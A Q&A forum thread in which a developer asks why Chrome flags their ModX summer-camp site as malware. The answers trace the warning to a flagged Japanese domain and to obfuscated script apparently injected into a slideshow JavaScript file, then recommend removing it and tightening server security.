My site has been tagged as Malware by Chrome! What now??

Question

I'm completing the development of a site I didn't build (I designed it, but another has built it so far) and recently when I visit the site in Chrome I get a "Malware Detected!" Warning box.

The site is http://kenbrook.org/ It's for a summer camp, and it's a basic brochure type site with your average marketing content. It was built on the ModX content management framework, and uses a few plugins.

I have no clue how or what this is from, or how to deal with it. In troubleshooting another isssue with this site (CSS related) a user in another stackoverflow question mentioned an insight about that malware problem: http://stackoverflow.com/questions/3325478/when-using-the-firefox-webdeveloper-toolbar-to-edit-css-why-do-some-image-disapp/3373080#3373080

I'm not even sure what that script is on the site for?! Can anyone give me any insight about this issue and how I should begin to resolve it? I'm responsible for it now, so "Go back to the original developer and get him to work it out" is not an option.

In case you'd rather not visit the site, here's the warning text that Chrome is giving me:

Warning: Visiting this site may harm your computer! The website at kenbrook.org contains elements from the site www.spiritek.co.jp, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer. For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for www.spiritek.co.jp. Learn more about how to protect yourself from harmful software online. I understand that visiting this site may harm my computer.

Answer 1

Well you're obviously linking something from that japanese site (image, flash, ad iframe, applet), and that japanese site is the one that is tagged for malware, not your site. Just remove the link to whatever it is and you'll be fine.

Answer 2

The only javascript I see loading is some google stuff. There's no reference to spiritek.co.jp. One guess is that

_gaq.push(['_setAccount', 'UA-4573442-6']);
_gaq.push(['_trackPageview']);

is an account number for www.spiritek.co.jp.

If you take out the javascript, does your problem go away?

Answer 3

I'm not really sure what the script at the very bottom of /assets/js/slides.js is doing, but I'd try taking the last 5 lines out and see if the cross fade thing still works. I seriously doubt that the "Browser Slide-Show script" has the need to obfuscate the JavaScript at the bottom. Someone wrote to this file.

If you have software that's able to write to slides.js, you have bigger problems. Get the security on the web server tightened up (apply latest updates, patches, check permissions, change passwords, etc).